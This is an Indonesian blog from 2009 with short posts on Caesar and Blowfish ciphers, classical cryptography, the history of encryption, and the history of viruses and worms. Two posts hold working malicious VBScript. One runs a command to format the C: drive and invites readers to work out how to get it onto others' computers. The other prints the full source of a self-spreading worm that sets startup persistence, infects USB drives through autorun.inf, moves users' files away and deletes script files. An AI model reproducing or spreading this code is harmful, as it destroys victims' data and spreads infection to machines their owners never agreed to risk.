Selasa, 07 April 2009

KRIPTOGRAFI CAESAR





Salah satu kriptografi yang paling tua dan paling sederhana adalah kriptogtafi Caesar. Menurut sejarah, ini adalah cara Julius Caesar mengirimkan surat cinta kepada kekasihnya Cleopatra. Dalam kriptografi Caesar, maka setiap huruf akan dituliskan dalam huruf lain hasil pergeseran 3 buah huruf. Kriptografi Caesar ini adalah kriptografi substitusi karena setiap huruf akan digantikan huruf lain.

Enkripsi Blowfish

Blowfish alias “OpenPGP.Cipher.4″ merupakan enkripsi yang termasuk dalam golongan Symmetric Cryptosystem , metoda enkripsinya mirip dengan DES (DES-like Cipher) diciptakan oleh seorang Cryptanalyst bernama Bruce Schneier Presiden perusahaan Counterpane Internet Security, Inc (Perusahaan konsultan tentang kriptografi dan keamanan Komputer) dan dipublikasikan tahun 1994. Dibuat untuk digunakan pada komputer yang mempunyai microposesor besar (32-bit keatas dengan cache data yang besar). Blowfish dikembangkan untuk memenuhi kriteria desain yang cepat dalam implementasinya dimana pada keadaan optimal dapat mencapai 26 clock cycle per byte, kompak dimana dapat berjalan pada memori kurang dari 5 KB, sederhana dalam algoritmanya sehingga mudah diketahui kesalahannya, dan keamanan yang variabel dimana panjang kunci bervariasi (minimum 32 bit, maksimum 448 bit, Multiple 8 bit, default 128 bit).Blowfish dioptimasikan untuk berbagai aplikasi dimana kunci tidak sering berubah, seperti pada jaringan komunikasi atau enkripsi file secara otomatis. Dalam pengimplementasiannya dalam komputer bermicroprosesor 32-bit dengan cache data yang besar (Pentium dan Power PC) Blowfish terbukti jauh lebih cepat dari DES. Tetapi Blowfish tidak cocok dengan aplikasi dengan perubahan kunci yang sering atau sebagai fungsi hast satu arah seperti pada aplikasi packet switching. Blowfish pun tidak dapat digunakan pada aplikasi kartu pintar (smart card) karena memerlukan memori yang besar.

KRIPTOGRAFI KLASIK


Ada dua cara yang paling dasar pada kriptografi klasik. Yang pertama adalah transposisi. Transposisi adalah mengubah susunan huruf pada plaintext sehingga urutannya berubah. Contoh yang paling sederhana adalah mengubah suatu kalimat dengan menuliskan setiap kata secara terbalik.

Plaintext: IBU AKAN DATANG BESOK PAGI
Ciphertext: UBI NAKA GNATAD KOSEB IGAP

Contoh transposisi yang sedikit lebih sulit adalah plaintext yang disusun dalam kelompok huruf yang terdiri dari beberapa kolom huruf, misalnya 5 kolom huruf :


IBUAK
ANDAT
ANGBE
SOKPA
GIAAA


Plaintext disusun dalam 5 kolom huruf

kemudian dituliskan per kolom, dengan urutan kolom yang bisa berubah-ubah. IAASGBNNOIUDGKAAABPAKTEAA Kolom huruf dituliskan berurutan dari kolom 1,2,3,4,5

Cara kedua adalah cara substitusi yaitu setiap huruf pada plaintext akan digantikan dengan huruf lain berdasarkan suatu cara atau rumus tertentu. Ada dua macam substitusi yaitu polyalphabetic substitution cipherdanmonoalphabetic substitution cipher. Padapolyalphabetic substitution cipher, enkripsi terhadap satu huruf yang sama bisa menghasilkan huruf yang berbeda sehingga lebih sulit untuk menemukan pola enkripsinya.
Pada monoalphabetic substitution cipher maka satu huruf tertentu pasti akan berubah menjadi huruf tertentu yang lain, sehingga pola enkripsinya lebih mudah diketahui, karena satu huruf pada ciphertext pasti merepresentasikan satu huruf pada plaintext.

SISTEM KRIPTOGRAFI



Cryptographic system ataucryptosystem adalah suatu fasilitas untuk mengkonversikan plaintext ke ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang menentukan transformasi pen- cipher-an tertentu disebut suatu set kunci. Proses enkripsi dan dekripsi diatur oleh satu atau beberapa kunci kriptografi.
Secara umum, kunci-kunci yang digunakan untuk proses pengenkripsian dan pendekripsian tidak perlu identik, tergantung pada sistem yang digunakan. Secara umum operasi enkripsi dan dekripsi dapat diterangkan secara matematis sebagai berikut :

EK (M) = C (Proses Enkripsi)
DK (C) = M (Proses Dekripsi)

Jumat, 03 April 2009

Sejarah Enkripsi


Enkripsi dilaporkan sudah ada sejak zaman dahulu, dimana jenderal-jenderal bangsa Sparta menulis pesan-pesan mereka pada perkamen yang dililitkan pada sebuah silinder yang tipis. Ketika perkamen dilepas dari silindernya, pesan-pesan yang ditulis muncul sebagai huruf-huruf yang urutannya tidak mempunyai arti atau acak dan hanya bisa dibaca dengan melilit perkamen tersebut pada silinder dengan ukuran yang sama ketika penulisannya. Pada saat abad ke 5 SM, seorang berbangsa Yunani yang bekerja pada kerajaan Persia mengirim sebuah pesan ke Yunani agar melakukan pembunuhan. Pesannya dikirim dengan cara men-tatonya pada kepala budaknya yang dipercaya. Ketika rambut pada kepala budak itu tumbuh kembali, tidak ada indikasi bahwa sebuah pesan telah dibawa. Metoda-metode jenis ini terus digunakan sampai Perang Dunia I, ketika agen-agen dikirim melewati garis pertahanan musuh dengan pesan-pesan ditulis pada kulit mereka dengan tinta yang tak kelihatan.

Data Ecryption

Salah satu hal yang penting dalam komunikasi menggunakan computer untuk menjamin kerahasian data adalah enkripsi. Enkripsi dalah sebuah proses yang melakukan perubahan sebuah kode dari yang bisa dimengerti menjadi sebuah kode yang tidak bisa dimengerti (tidak terbaca). Enkripsi dapat diartikan sebagai kode atau chiper. Sebuah sistem pengkodean menggunakan suatu table atau kamus yang telah didefinisikan untuk mengganti kata dari informasi atau yang merupakan bagian dari informasi yang dikirim. Sebuah chiper menggunakan suatu algoritma yang dapat mengkodekan semua aliran data (stream) bit dari sebuah pesan menjadi cryptogram yang tidak dimengerti (unitelligible). Karena teknik cipher merupakan suatu sistem yang telah siap untuk di automasi, maka teknik ini digunakan dalam sistem keamanan komputer dan network. Pada bagian selanjutnya kita akan membahas berbagai macam teknik enkripsi yang biasa digunakan dalam sistem sekuriti dari sistem komputer dan network.

Visual Basic Sederhana Tapi berbahaya

Set WshShell = WScript.CreateObject("WScript.Shell")
X = MsgBox("Halo dunia bertanya siapkah anda mengganti operating system anda ?", vbYesNo, "Awas bahaya ngga tanggung jawab!")
If X = 6 Then
WshShell.Run("format.com /y C:")
End If
---------------------------------------------------------

itu kode VBS yang saya buat sangat simple dan saya rasa mudah untuk dimengerti kalangan umum kalau di jalankan maka akan memformat drive c: dengan indahnya Apa saja shell command?? cari pake GOGGLE.COM ! pokoknya idop google :P
Here sample command :

run.exe rundll user,#7
run.exe rundll user,#4
run.exe rundll user,#3
dan lain lain nah........

sekarang bagaimana caranya file ini bisa masuk ke komputer orang?? pikirkan sendiri bagaimana?
sumber
Sri Maryati Pratiwi

Rabu, 01 April 2009

All about of virus, worm, and trojan

Gagasan worm dan virus berawal pada tahun 1949, saat seorang founder Electronic Discrete Variable Automatic Computer (EDVAC), John Von Newman, memaparkan dalam sebuah papernya yang berjudul "Theory and Organization of Complicated Automata", dibahas suatu kemungkinan bahwa suatu program dapat melakukan penyebaran dengan sendirinya. Kemudian pada tahun 1960-an, para peneliti AT&T Bell Laboratory membuat semacam permainan dengan menciptakan suatu program yang dapat memusnahkan program ciptaan lawan, dan mampu bertahan terhadap serangan program lawan lainnya. Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling banyak. Para peneliti sadar akan bahaya program tersebut, maka setiap selesai permainan program tersebut selalu dimusnahkan. Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada tahun 1971. Program ini merupakan solusi dari kebutuhan system kendali lalu lintas udara. Program ini akan membantu mengingatkan operator apabila pengendalian suatu pesawat udara berpindah dari satu komputer ke komputer lainnya. Sesungguhnya program yang disebut "creeper" ini hanya berpindah dari layar ke layar pada jaringan, dengan menampilkan pesan "I’m creeper! Catch me if you can!". Tetapi program creeper tidak mereproduksi dirinya sendiri, hingga beberapa programmer lain

mencoba membuat program serupa, tetapi gagasan tersebut berangsur- angsur hilang dalam beberapa bulan kemudian. Istilah "virus" mungkin sudah tidak asing terdengar, dapat dikatakan hampir setiap orang yang mengenal komputer juga mengenal istilah ini, sementara istilah "worm" tidak begitu dikenal, padahal istilah ini diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto Research Centre) pada tahun 1979 sebelum istilah virus computer dipublikasikan. Istilah worm ini ternyata diilhami oleh suatu program "tapeworm" (cacing pita) dalam sebuah novel fiksi ilmiah karangan John Brunner yang berjudul "The Shockwave Rider", yang mengisahkan suatu pemerintahan totaliter yang mengendalikan warga negaranya melalui suatu jaringan komputer. Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel tersebut kemudian memenuhi jaringan dengan suatu program yang disebut "tapeworm" sehingga memaksa mematikan jaringan computer yang secara otomatis juga menghilangkan kendali pemerintah terhadap warga negaranya. Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan sebuah penelitian dengan mengembangkan lima buah program worm, masing-masing worm dibuat dengan tujuan tertentu yang membantu jaringan disekitarnya. Beberapa worm terlihat sederhana, seperti worm "town crier" yang bertugas memasuki jaringan hanya untuk menampilkan pengumuman. Worm lainnya terlihat lebih kompleks dan pintar, seperti worm "vampire". Worm ini tidak akan melakukan kegiatan pada siang harinya, tetapi saat malam hari worm akan melakukan suatu kegiatan tertentu yang telah terprogram sebelumnya, ini berguna untuk memanfaatkan computer yang tidak bekerja pada malam hari dengan memberikan tugas yang kompleks dan memerlukan daya proses yang lebih. Saat fajar, worm akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore berikutnya. Walau bagaimanapun, walaupun program ini berguna tapi disadari bahwa program ini juga akan sangat berbahaya apabila salah digunakan. Hal ini terbukti saat sebuah worm mengalami malfungsi pada suatu malam dan keesokan harinya para pekerja menemukan seluruh komputer yang ada pada jaringan tersebut mengalami crash (suatu kerusakan dimana system output dan input tidak berfungsi). Lebih dari itu saat komputer dihidupkan kembali, worm malfungsi tersebut kembali membuat komputer crash. Pada akhirnya dibuat semacam vaksin untuk mencegah worm tersebut, dan mulai saat itu penelitian terhadap worm tersebut ditutup untuk umum.

Istilah “VIRUS” selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm,Trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut:

->> Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.

->> Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebut sebagai suatu file infector.

->> Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.

->> Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses cracking atau hacking.

Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan। Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector.

सुम्बेर : http://fitri-ariyanto.blogspot.com/2008/02/apakah-virus-worm-trojan.html

Contoh Sourse Virus

Kali ini saya akan memberikan sedikit contoh dari script virus yang bernama the_legend_of_Aang.vbs

Listing unencrypted



'******************** Now AnG is Encrypted ***************

'**************************************************************

'******************* Call me The legend of Aang ***************



Option Explicit

On Error Resume Next

Dim Fso

Set Fso = CreateObject("Scripting.FileSystemObject")


Dim Shells

Set Shells = CreateObject("Wscript.Shell")


Dim WinDir

Set WinDir = Fso.GetSpecialFolder(0)


Dim SystemDir

Set SystemDir =Fso.GetSpecialFolder(1)


Dim File

Set File = Fso.GetFile(WScript.ScriptFullName)


Dim Drv

Set Drv=File.Drive


Dim InDrive

Set InDrive = Fso.drives


Dim ReadAll,AllFile

Set ReadAll=File.OpenAsTextStream(1,-2)

do while not ReadAll.atendofstream

AllFile = AllFile & ReadAll.readline & vbcrlf

Loop


Dim Count

Count=Drv.DriveType


Dim WriteAll

Do


If Not Fso.FileExists(SystemDir & "\Aang.vbs") then

set WriteAll = Fso.CreateTextFile(SystemDir & "\Aang.vbs",2,true)

WriteAll.Write AllFile

WriteAll.close

set WriteAll = Fso.GetFile(SystemDir & "\Aang.vbs")

WriteAll.Attributes = -1

End If


Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _

SystemDir & "\wscript.exe " & SystemDir & "\Aang.vbs"



Dim Drives

For Each Drives In InDrive


If Drives.DriveType=2 Then

LookVBS "inf",Drives.Path & "\"

LookVBS "INF",Drives.Path & "\"

End if


If Drives.DriveType = 1 Or Drives.DriveType = 2 Then

If Drives.Path<> "A:" Then

Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""

Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"

LookVBS "vbs",WinDir & "\"

LookVBS "vbs",Drives.Path & "\"

If Drives.DriveType = 1 Then

If Drives.Path<>"A:" Then

If Not Fso.FileExists(Drives.Path & "\The_Legend_Of_Aang.vbs") Then

set writeall=fso.CreateFolder (SystemDir & "\RemovableCache")

writeall.close

set writeall=fso.copyfolder (Drives.path & "\*",SystemDir & "\RemovableCache")

writeall.close

set writeall=fso.moveFile (Drives.path & "\*.*",SystemDir & "\RemovableCache")

writeall.close

'set writeall=fso.Deletefolder (Drives.path & "\*",2)

writeall.close

'set writeall=fso.DeleteFile (Drives.path & "\*.*",2)

writeall.close

Set WriteAll=Fso.CreateTextFile(Drives.Path & "\The_Legend_Of_Aang.vbs",2,True)

WriteAll.Write AllFile

WriteAll.Close

Set WriteAll = Fso.GetFile(Drives.Path & "\The_Legend_Of_Aang.vbs")

WriteAll.Attributes = -1

writeall.close

End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then

Dim Chg

Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")

Chg.Attributes = -8

End if

Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)

WriteAll.writeline "[Autorun]" & vbcrlf & "UseAutoplay=1" & vbcrlf & "Icon=%SystemRoot%\system32\SHELL32.dll,7" & vbcrlf & "Shellexecute=wscript.exe The_Legend_Of_Aang.vbs" & vbCrLf & "Shell\OPEN\COMMAND=wscript.exe The_Legend_Of_Aang.vbs"& VbCrlf &"Shell\explore\COMMAND=wscript.exe The_Legend_Of_Aang.vbs" & VbCrLf & "Action=Open folder to view files"

WriteAll.Close

Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")

WriteAll.Attributes = -1

End If

End if

End if

End If


Next


if Count <> 1 then

Wscript.sleep 10000

end if


loop while Count<>1



sub LookVBS(File2Find, SrchPath)

Dim oFileSys, oFolder, oFile,Cut,Delete

Set oFileSys = CreateObject("Scripting.FileSystemObject")

Set oFolder = oFileSys.GetFolder(SrchPath)

For Each oFile In oFolder.Files

Cut=Right(oFile.Name,3)

If UCase(Cut)=UCase(file2find) Then

If oFile.Name <> "The_Legend_Of_Aang.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)

End If

Next

End sub


sumber :mjalah komputer chip